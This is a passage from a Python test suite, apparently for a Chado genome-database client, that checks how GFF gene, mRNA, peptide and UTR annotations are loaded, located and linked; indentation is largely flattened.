assert gene_f.featureloc_collection[0].phase is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].residue_info is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].locgroup == 0, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].rank == 0, "gff>gene located correctly"
src_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=gene_f.featureloc_collection[0].srcfeature_id) \
.one()
assert src_f.uniquename == "scaffold00001", "gff>gene loaded correctly"
scaff1_id = src_f.feature_id
# Check gene aliases
exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
syns = {synf.synonym.name: synf.synonym.type_id for synf in gene_f.feature_synonym_collection}
assert len(syns) == 2, "gff>gene aliases loaded correctly"
assert 'some-synonym' in syns, "gff>gene aliases loaded correctly"
assert 'another synonym' in syns, "gff>gene aliases loaded correctly"
assert syns['some-synonym'] == exactterm, "gff>gene aliases loaded correctly"
assert syns['another synonym'] == exactterm, "gff>gene aliases loaded correctly"
# Check gene dbxref
dbs = self.ci.session.query(self.ci.model.db.db_id, self.ci.model.db.name, self.ci.model.db.description) \
.filter((self.ci.model.db.name == 'GO') | (self.ci.model.db.name == 'FOOBAR') | (self.ci.model.db.name == 'FOOBARXX') | (self.ci.model.db.name == 'GFF_source'))
for db in dbs:
if db.name == "FOOBAR":
assert db.description == "Added automatically by the GFF loader", "gff>gene dbxrefs db loaded correctly"
dbs = {db.name: db.db_id for db in dbs}
assert len(dbs) == 4, "gff>gene dbxrefs db loaded correctly"
xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in gene_f.feature_dbxref_collection}
assert len(xrefs) == 3, "gff>gene dbxrefs loaded correctly"
assert '0061611' in xrefs, "gff>gene dbxrefs loaded correctly"
assert '6528B' in xrefs, "gff>gene dbxrefs loaded correctly"
assert 'phytozome6' in xrefs, "gff>gene dbxrefs loaded correctly"
assert xrefs['0061611'] == dbs['GO'], "gff>gene dbxrefs loaded correctly"
assert xrefs['6528B'] == dbs['FOOBAR'], "gff>gene dbxrefs loaded correctly"
assert xrefs['phytozome6'] == dbs['GFF_source'], "gff>gene dbxrefs loaded correctly"
# Check gene featureprop
expected = [
'Gap___BLABLA___0',
'Gap___BLOBLO___1',
'Note___that\'s fantastic___0',
'Note___really___1',
'Poutrelle___test___1',
'Poutrelle___lapinou___0',
]
assert len(gene_f.featureprop_collection) == 6, "gff>gene loaded correctly"
for prop in gene_f.featureprop_collection:
assert prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank) in expected, "gff>gene loaded correctly"
expected.remove(prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank))
# Check mrna
rna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136219") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
rnaterm = self.ci.get_cvterm_id('mRNA', 'sequence')
# Check mRNA feature
assert rna_f.dbxref_id is None, "gff>mRNA loaded correctly"
assert rna_f.organism_id == org['organism_id'], "gff>mRNA loaded correctly"
assert rna_f.name == "orange1.1g015615m", "gff>mRNA loaded correctly"
assert rna_f.uniquename == "PAC:18136219", "gff>mRNA loaded correctly"
assert rna_f.residues is None, "gff>mRNA loaded correctly"
assert rna_f.seqlen is None, "gff>mRNA loaded correctly"
assert rna_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>mRNA loaded correctly"
assert rna_f.type_id == rnaterm, "gff>mRNA loaded correctly"
assert rna_f.is_analysis is False, "gff>mRNA loaded correctly"
assert rna_f.is_obsolete is False, "gff>mRNA loaded correctly"
# Check mRNA loc
        assert len(rna_f.featureloc_collection) == 1, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].fmin == 4058759, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].fmax == 4062210, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].is_fmin_partial is False, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].is_fmax_partial is False, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].strand == 1, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].phase is None, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].residue_info is None, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].locgroup == 0, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].rank == 0, "gff>mRNA located correctly"
assert scaff1_id == rna_f.featureloc_collection[0].srcfeature_id, "gff>mRNA loaded correctly"
# Check mRNA aliases
exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
syns = {synf.synonym.name: synf.synonym.type_id for synf in rna_f.feature_synonym_collection}
assert len(syns) == 2, "gff>mRNA aliases loaded correctly"
assert 'some-synonym' in syns, "gff>mRNA aliases loaded correctly"
assert 'another synonym' in syns, "gff>mRNA aliases loaded correctly"
assert syns['some-synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
assert syns['another synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
# Check mRNA dbxref
xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in rna_f.feature_dbxref_collection}
assert len(xrefs) == 3, "gff>mRNA dbxrefs loaded correctly"
assert '0061621' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert '6528A' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert 'phytozome6' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert xrefs['0061621'] == dbs['GO'], "gff>mRNA dbxrefs loaded correctly"
assert xrefs['6528A'] == dbs['FOOBARXX'], "gff>mRNA dbxrefs loaded correctly"
assert xrefs['phytozome6'] == dbs['GFF_source'], "gff>mRNA dbxrefs loaded correctly"
# Check relationships
parents = {x.object_id: x.type_id for x in rna_f.subject_in_relationships}
assert len(parents) == 1, "mRNA relationships"
partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
assert rna_f.subject_in_relationships[0].type_id == partofterm, "mRNA relationships"
derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
peps = [x.subject_id for x in rna_f.object_in_relationships if x.type_id == derivesfromterm]
assert len(peps) == 1, "mRNA relationships, single peptide"
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=peps[0]) \
.one()
# Check pep feature
pepterm = self.ci.get_cvterm_id('polypeptide', 'sequence')
assert pep_f.dbxref_id is None, "gff>pep loaded correctly"
assert pep_f.organism_id == org['organism_id'], "gff>pep loaded correctly"
assert pep_f.name == "orange1.1g015615m", "gff>pep loaded correctly"
assert pep_f.uniquename == "PAC:18136219-protein", "gff>pep loaded correctly"
assert pep_f.residues is None, "gff>pep loaded correctly"
assert pep_f.seqlen is None, "gff>pep loaded correctly"
assert pep_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>pep loaded correctly"
assert pep_f.type_id == pepterm, "gff>pep loaded correctly"
assert pep_f.is_analysis is False, "gff>pep loaded correctly"
assert pep_f.is_obsolete is False, "gff>pep loaded correctly"
# Check pep loc
assert len(pep_f.featureloc_collection) == 1, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].fmin == 4059234, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].fmax == 4061905, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].is_fmin_partial is False, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].is_fmax_partial is False, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].strand == 1, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].phase is None, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].residue_info is None, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].locgroup == 0, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].rank == 0, "gff>pep located correctly"
assert scaff1_id == pep_f.featureloc_collection[0].srcfeature_id, "gff>pep loaded correctly"
children = {x.subject_id: x for x in rna_f.object_in_relationships if x.type_id != derivesfromterm}
        assert len(children) == 15, "mRNA relationships, children count"
cdsterm = self.ci.get_cvterm_id('CDS', 'sequence')
exonterm = self.ci.get_cvterm_id('exon', 'sequence')
utr3term = self.ci.get_cvterm_id('three_prime_UTR', 'sequence')
utr5term = self.ci.get_cvterm_id('five_prime_UTR', 'sequence')
for c in children:
assert children[c].type_id == partofterm, "subsubfeatures"
if children[c].subject.type_id == utr3term:
subsub_f = children[c].subject
assert children[c].subject.type_id in (cdsterm, exonterm, utr3term, utr5term), "subsubfeatures"
# Check a subsubfeature
assert subsub_f.dbxref_id is None, "gff>utr loaded correctly"
assert subsub_f.organism_id == org['organism_id'], "gff>utr loaded correctly"
assert subsub_f.name.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
assert subsub_f.uniquename.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
assert subsub_f.residues is None, "gff>utr loaded correctly"
assert subsub_f.seqlen is None, "gff>utr loaded correctly"
assert subsub_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>utr loaded correctly"
assert subsub_f.type_id == utr3term, "gff>utr loaded correctly"
assert subsub_f.is_analysis is False, "gff>utr loaded correctly"
assert subsub_f.is_obsolete is False, "gff>utr loaded correctly"
assert len(subsub_f.featureloc_collection) == 1, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].fmin == 4061905, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].fmax == 4062210, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].is_fmin_partial is False, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].is_fmax_partial is False, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].strand == 1, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].phase is None, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].residue_info is None, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].locgroup == 0, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].rank == 0, "gff>utr located correctly"
# Check utr with 2 parents
confused_child_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename='an_utr_with_two_parents') \
.all()
assert len(confused_child_f) == 1, "1 utr with 2 parents"
confused_rels = confused_child_f[0].subject_in_relationships
assert len(confused_rels) == 2, "1 utr with 2 parents"
for r in confused_rels:
assert (r.object.uniquename == 'PAC:18136239') or (r.object.uniquename == 'PAC:18136238'), "1 utr with 2 parents"
# Check Derives_from
derivesfrom = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename='some_special_cds') \
.all()
assert len(derivesfrom) == 1, "derives_from"
derivesfrom_rels = derivesfrom[0].subject_in_relationships
assert len(derivesfrom_rels) == 2, "derives_from"
for r in derivesfrom_rels:
assert (r.object.uniquename == 'PAC:18136217') or (r.object.uniquename == 'PAC:18136225'), "derives_from"
terms = {cvt.cvterm.name: cvt.cvterm.dbxref.db_id for cvt in derivesfrom[0].feature_cvterm_collection}
assert len(terms) == 2, "gff>ontology_term loaded correctly"
assert '000001' in terms, "gff>ontology_term loaded correctly"
assert '00002' in terms, "gff>ontology_term loaded correctly"
assert terms['000001'] == dbs['GO'], "gff>ontology_term loaded correctly"
assert terms['00002'] == dbs['GO'], "gff>ontology_term loaded correctly"
# Target location
assert len(derivesfrom[0].featureloc_collection) == 2, "gff>target loc ok"
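        # The Target attribute adds a second featureloc; find the one at fmin == 120 (the target location, rank 1).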
if derivesfrom[0].featureloc_collection[0].fmin == 120:
checkedloc = 0
else:
checkedloc = 1
assert derivesfrom[0].featureloc_collection[checkedloc].fmin == 120, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].fmax == 320, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].strand == -1, "gff>target loc ok"
        assert derivesfrom[0].featureloc_collection[checkedloc].rank == 1, "gff>target loc ok"
def test_load_gff_pepregex(self):
org = self._create_fake_org()
an = self._create_fake_an()
an_gff = self._create_fake_an('gff')
self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'], sequence_type='supercontig')
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], re_protein="foo\\1-bar", re_protein_capture="PAC:([0-9]+)", no_seq_compute=True)
# Check mrna
rna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136219") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
# Check relationships
parents = {x.object_id: x.type_id for x in rna_f.subject_in_relationships}
assert len(parents) == 1, "mRNA relationships"
partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
assert rna_f.subject_in_relationships[0].type_id == partofterm, "mRNA relationships"
derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
peps = [x.subject_id for x in rna_f.object_in_relationships if x.type_id == derivesfromterm]
assert len(peps) == 1, "mRNA relationships, single peptide"
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=peps[0]) \
.one()
# Check pep feature
assert pep_f.uniquename == "foo18136219-bar", "gff>pep loaded correctly"
def test_load_gff_pepregex2(self):
org = self._create_fake_org()
an = self._create_fake_an()
an_gff = self._create_fake_an('gff')
self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'], sequence_type='supercontig')
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], re_protein="foo\\1-bar", no_seq_compute=True)
# Check mrna
rna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136219") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
# Check relationships
parents = {x.object_id: x.type_id for x in rna_f.subject_in_relationships}
assert len(parents) == 1, "mRNA relationships"
partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
assert rna_f.subject_in_relationships[0].type_id == partofterm, "mRNA relationships"
derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
peps = [x.subject_id for x in rna_f.object_in_relationships if x.type_id == derivesfromterm]
assert len(peps) == 1, "mRNA relationships, single peptide"
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=peps[0]) \
.one()
# Check pep feature
assert pep_f.uniquename == "fooPAC:18136219-bar", "gff>pep loaded correctly"
def test_load_gff_twice(self):
org = self._create_fake_org()
an = self._create_fake_an()
an_gff = self._create_fake_an('gff')
        # Loading the same gff twice should not change anything in the db
self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'], sequence_type='supercontig')
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
gene_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="orange1.1g015632m.g") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
geneterm = self.ci.get_cvterm_id('gene', 'sequence')
# Check gene feature
assert gene_f.dbxref_id is None, "gff>gene loaded correctly"
assert gene_f.organism_id == org['organism_id'], "gff>gene loaded correctly"
assert gene_f.name == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.uniquename == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.residues is None, "gff>gene loaded correctly"
assert gene_f.seqlen is None, "gff>gene loaded correctly"
assert gene_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>gene loaded correctly"
assert gene_f.type_id == geneterm, "gff>gene loaded correctly"
assert gene_f.is_analysis is False, "gff>gene loaded correctly"
assert gene_f.is_obsolete is False, "gff>gene loaded correctly"
# Check gene loc
        assert len(gene_f.featureloc_collection) == 1, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].fmin == 4058459, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].fmax == 4062210, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmin_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmax_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].strand == 1, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].phase is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].residue_info is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].locgroup == 0, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].rank == 0, "gff>gene located correctly"
src_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=gene_f.featureloc_collection[0].srcfeature_id) \
.one()
assert src_f.uniquename == "scaffold00001", "gff>gene loaded correctly"
scaff1_id = src_f.feature_id
# Check gene aliases
exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
syns = {synf.synonym.name: synf.synonym.type_id for synf in gene_f.feature_synonym_collection}
assert len(syns) == 2, "gff>gene aliases loaded correctly"
assert 'some-synonym' in syns, "gff>gene aliases loaded correctly"
assert 'another synonym' in syns, "gff>gene aliases loaded correctly"
assert syns['some-synonym'] == exactterm, "gff>gene aliases loaded correctly"
assert syns['another synonym'] == exactterm, "gff>gene aliases loaded correctly"
# Check gene dbxref
dbs = self.ci.session.query(self.ci.model.db.db_id, self.ci.model.db.name, self.ci.model.db.description) \
.filter((self.ci.model.db.name == 'GO') | (self.ci.model.db.name == 'FOOBAR') | (self.ci.model.db.name == 'FOOBARXX') | (self.ci.model.db.name == 'GFF_source'))
for db in dbs:
if db.name == "FOOBAR":
assert db.description == "Added automatically by the GFF loader", "gff>gene dbxrefs db loaded correctly"
dbs = {db.name: db.db_id for db in dbs}
assert len(dbs) == 4, "gff>gene dbxrefs db loaded correctly"
xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in gene_f.feature_dbxref_collection}
assert len(xrefs) == 3, "gff>gene dbxrefs loaded correctly"
assert '0061611' in xrefs, "gff>gene dbxrefs loaded correctly"
assert '6528B' in xrefs, "gff>gene dbxrefs loaded correctly"
assert 'phytozome6' in xrefs, "gff>gene dbxrefs loaded correctly"
assert xrefs['0061611'] == dbs['GO'], "gff>gene dbxrefs loaded correctly"
assert xrefs['6528B'] == dbs['FOOBAR'], "gff>gene dbxrefs loaded correctly"
assert xrefs['phytozome6'] == dbs['GFF_source'], "gff>gene dbxrefs loaded correctly"
# Check gene featureprop
expected = [
'Gap___BLABLA___0',
'Gap___BLOBLO___1',
'Note___that\'s fantastic___0',
'Note___really___1',
'Poutrelle___test___1',
'Poutrelle___lapinou___0',
]
assert len(gene_f.featureprop_collection) == 6, "gff>gene loaded correctly"
for prop in gene_f.featureprop_collection:
assert prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank) in expected, "gff>gene loaded correctly"
expected.remove(prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank))
# Check mrna
rna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136219") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
rnaterm = self.ci.get_cvterm_id('mRNA', 'sequence')
# Check mRNA feature
assert rna_f.dbxref_id is None, "gff>mRNA loaded correctly"
assert rna_f.organism_id == org['organism_id'], "gff>mRNA loaded correctly"
assert rna_f.name == "orange1.1g015615m", "gff>mRNA loaded correctly"
assert rna_f.uniquename == "PAC:18136219", "gff>mRNA loaded correctly"
assert rna_f.residues is None, "gff>mRNA loaded correctly"
assert rna_f.seqlen is None, "gff>mRNA loaded correctly"
assert rna_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>mRNA loaded correctly"
assert rna_f.type_id == rnaterm, "gff>mRNA loaded correctly"
assert rna_f.is_analysis is False, "gff>mRNA loaded correctly"
assert rna_f.is_obsolete is False, "gff>mRNA loaded correctly"
# Check mRNA loc
        assert len(rna_f.featureloc_collection) == 1, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].fmin == 4058759, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].fmax == 4062210, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].is_fmin_partial is False, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].is_fmax_partial is False, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].strand == 1, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].phase is None, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].residue_info is None, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].locgroup == 0, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].rank == 0, "gff>mRNA located correctly"
assert scaff1_id == rna_f.featureloc_collection[0].srcfeature_id, "gff>mRNA loaded correctly"
# Check mRNA aliases
exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
syns = {synf.synonym.name: synf.synonym.type_id for synf in rna_f.feature_synonym_collection}
assert len(syns) == 2, "gff>mRNA aliases loaded correctly"
assert 'some-synonym' in syns, "gff>mRNA aliases loaded correctly"
assert 'another synonym' in syns, "gff>mRNA aliases loaded correctly"
assert syns['some-synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
assert syns['another synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
# Check mRNA dbxref
xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in rna_f.feature_dbxref_collection}
assert len(xrefs) == 3, "gff>mRNA dbxrefs loaded correctly"
assert '0061621' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert '6528A' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert 'phytozome6' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert xrefs['0061621'] == dbs['GO'], "gff>mRNA dbxrefs loaded correctly"
assert xrefs['6528A'] == dbs['FOOBARXX'], "gff>mRNA dbxrefs loaded correctly"
assert xrefs['phytozome6'] == dbs['GFF_source'], "gff>mRNA dbxrefs loaded correctly"
# Check relationships
parents = {x.object_id: x.type_id for x in rna_f.subject_in_relationships}
assert len(parents) == 1, "mRNA relationships"
partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
assert rna_f.subject_in_relationships[0].type_id == partofterm, "mRNA relationships"
derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
peps = [x.subject_id for x in rna_f.object_in_relationships if x.type_id == derivesfromterm]
assert len(peps) == 1, "mRNA relationships, single peptide"
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=peps[0]) \
.one()
# Check pep feature
pepterm = self.ci.get_cvterm_id('polypeptide', 'sequence')
assert pep_f.dbxref_id is None, "gff>pep loaded correctly"
assert pep_f.organism_id == org['organism_id'], "gff>pep loaded correctly"
assert pep_f.name == "orange1.1g015615m", "gff>pep loaded correctly"
assert pep_f.uniquename == "PAC:18136219-protein", "gff>pep loaded correctly"
assert pep_f.residues is None, "gff>pep loaded correctly"
assert pep_f.seqlen is None, "gff>pep loaded correctly"
assert pep_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>pep loaded correctly"
assert pep_f.type_id == pepterm, "gff>pep loaded correctly"
assert pep_f.is_analysis is False, "gff>pep loaded correctly"
assert pep_f.is_obsolete is False, "gff>pep loaded correctly"
# Check pep loc
assert len(pep_f.featureloc_collection) == 1, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].fmin == 4059234, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].fmax == 4061905, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].is_fmin_partial is False, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].is_fmax_partial is False, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].strand == 1, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].phase is None, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].residue_info is None, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].locgroup == 0, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].rank == 0, "gff>pep located correctly"
assert scaff1_id == pep_f.featureloc_collection[0].srcfeature_id, "gff>pep loaded correctly"
children = {x.subject_id: x for x in rna_f.object_in_relationships if x.type_id != derivesfromterm}
        assert len(children) == 30, "mRNA relationships, children count"  # relations to utr/cds/exons are duplicated as they don't have an ID or Name attribute in gff => random uniquename in db
cdsterm = self.ci.get_cvterm_id('CDS', 'sequence')
exonterm = self.ci.get_cvterm_id('exon', 'sequence')
utr3term = self.ci.get_cvterm_id('three_prime_UTR', 'sequence')
utr5term = self.ci.get_cvterm_id('five_prime_UTR', 'sequence')
for c in children:
assert children[c].type_id == partofterm, "subsubfeatures"
if children[c].subject.type_id == utr3term:
subsub_f = children[c].subject
assert children[c].subject.type_id in (cdsterm, exonterm, utr3term, utr5term), "subsubfeatures"
# Check a subsubfeature
assert subsub_f.dbxref_id is None, "gff>utr loaded correctly"
assert subsub_f.organism_id == org['organism_id'], "gff>utr loaded correctly"
assert subsub_f.name.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
assert subsub_f.uniquename.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
assert subsub_f.residues is None, "gff>utr loaded correctly"
assert subsub_f.seqlen is None, "gff>utr loaded correctly"
assert subsub_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>utr loaded correctly"
assert subsub_f.type_id == utr3term, "gff>utr loaded correctly"
assert subsub_f.is_analysis is False, "gff>utr loaded correctly"
assert subsub_f.is_obsolete is False, "gff>utr loaded correctly"
assert len(subsub_f.featureloc_collection) == 1, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].fmin == 4061905, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].fmax == 4062210, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].is_fmin_partial is False, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].is_fmax_partial is False, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].strand == 1, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].phase is None, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].residue_info is None, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].locgroup == 0, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].rank == 0, "gff>utr located correctly"
# Check utr with 2 parents
confused_child_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename='an_utr_with_two_parents') \
.all()
assert len(confused_child_f) == 1, "1 utr with 2 parents"
confused_rels = confused_child_f[0].subject_in_relationships
assert len(confused_rels) == 2, "1 utr with 2 parents"
for r in confused_rels:
assert (r.object.uniquename == 'PAC:18136239') or (r.object.uniquename == 'PAC:18136238'), "1 utr with 2 parents"
# Check Derives_from
derivesfrom = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename='some_special_cds') \
.all()
assert len(derivesfrom) == 1, "derives_from"
derivesfrom_rels = derivesfrom[0].subject_in_relationships
assert len(derivesfrom_rels) == 2, "derives_from"
for r in derivesfrom_rels:
assert (r.object.uniquename == 'PAC:18136217') or (r.object.uniquename == 'PAC:18136225'), "derives_from"
terms = {cvt.cvterm.name: cvt.cvterm.dbxref.db_id for cvt in derivesfrom[0].feature_cvterm_collection}
assert len(terms) == 2, "gff>ontology_term loaded correctly"
assert '000001' in terms, "gff>ontology_term loaded correctly"
assert '00002' in terms, "gff>ontology_term loaded correctly"
assert terms['000001'] == dbs['GO'], "gff>ontology_term loaded correctly"
assert terms['00002'] == dbs['GO'], "gff>ontology_term loaded correctly"
# Target location
assert len(derivesfrom[0].featureloc_collection) == 2, "gff>target loc ok"
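        # The Target attribute adds a second featureloc; find the one at fmin == 120 (the target location, rank 1).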
if derivesfrom[0].featureloc_collection[0].fmin == 120:
checkedloc = 0
else:
checkedloc = 1
assert derivesfrom[0].featureloc_collection[checkedloc].fmin == 120, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].fmax == 320, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].strand == -1, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].rank == 1, "gff>target loc ok"
def test_load_gff_landmarktype(self):
org = self._create_fake_org()
an = self._create_fake_an()
an_gff = self._create_fake_an('gff')
        # There's a contig loaded from the fasta, while the gff expects a supercontig landmark
self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'])
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
gene_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="orange1.1g015632m.g") \
